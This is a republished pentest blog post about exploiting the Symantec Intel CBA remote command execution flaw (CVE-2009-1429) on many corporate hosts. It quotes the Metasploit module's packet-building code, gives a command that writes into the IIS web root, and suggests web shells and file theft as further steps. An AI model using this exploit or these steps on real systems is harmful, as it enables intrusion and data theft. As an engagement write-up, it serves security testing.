• Penetration testing - [Intel CBA CreateProcess() on Symantec ]

    One of the best way of getting a good output form a PT when you have a huge no of IPs for audit,and considerably less time, is to
    [+] Put an Nmap scan on all the IPs and see if it has any common service running
    [-] Admins who manage DCs will usually have the habit of installing extra add-don services to their host
    [-] System updates are properly done, but add-don updates are neglected.
    [+]So same third party services will be installed widely on all the host .

    Any ways this common stupid practice was something which I noticed, but this find is all about exploiting the Intel CBA CreateProcess() on Symantec , which has the CVE:http://cve.mitre.org/cgi-bin/cvename...=CVE-2009-1429 and Nessus -Home feed have a plug-in for listing this bug.



    [+] Symantec is the widely used IDS+AV system for most of the corporate networks
    [+]Symantec Client will be installed on all the systems
    [-] So if one target is found, the possibility is high that many other vulnerable systems will be there.

    Triggering the exploit

    This one is actually a command execution exploit , that when a data packet with String CMD is passed to the listener, its passed on to the symentec product CreateProcess and is interpreted as command, making it possible to execute OS commands remotely.


    MSF have a module for this one in:
    auxiliary\admin\symantec\cba_exec.rb

    Code:
    len  = 2 + datastore['CMD'].length
    
                    data =  [0x00000000].pack('V')
                    data << len.chr
                    data << "\x00"
                    data << datastore['CMD'] + " " //windows command to be passed
                    data << "\x00"
    
                    print_status("Sending command: #{datastore['CMD']}")
                    sock.put(data)
    
                    res = sock.get_once
    
                        if (!res)
                            print_error("Did not recieve data. Failed?")
                        else
                            print_status("Got data, execution successful!")
                        end
    
                    disconnect
    I loaded MSF with the associated auxiliary.
    [+] Current PT was done on a symentec Corporate edition Installed servers, and its was easy to 0wn them all .

    I loaded MSF and choose the right exploit


    woot woot the commands I set got executed successfully

    Well my scope of work was VA + PT but as targets were critical ones, I shouldn't by any chance execute, change any passwords, but obviously a POC of the exploit is need in the report so what I did was this.

    [+] When nmap was done it showed that IIS was running with IIS default page iisstart.html.


    [+] Now that we have a world readable folder in the C:\inetepub\wwwroot we could Change|Modify|Edit|Add any files there .

    [+] Just set the Exploit CMD argument with

    Code:
     echo FB1H2S > c:\\inetpub\\wwwroot\\fb1h2s.html
    But I wanted the default page , so just modified the iisstart.html page with a Security audit banner



    [+] Like wise I took the other Vulnerable Systems

    [+] But this is not the extend of what we could do, we could drop a PHP, ASP shell on the IIS directory and could run them , could set arbitrary registry values and execute other malicious scripts, download other sensitive files by moving them to the servers HTTP directory and lot more, but as my scope of work was over I quit thinking more wicked stuffs.

    Regards
    FB1H2S
    This article was originally published in blog: Penetration testing - [Intel CBA CreateProcess() on Symantec ] started by fb1h2s
    Comments 2 Comments
    1. D4rk357's Avatar
      D4rk357 -
      Awesome one bro . . Admin would have had a major heart attack seeing Security audit banner
    1. acutev6's Avatar
      acutev6 -
      Nice one buddy.. Good work..!
  • G4H Facebook

  • G4H Twitter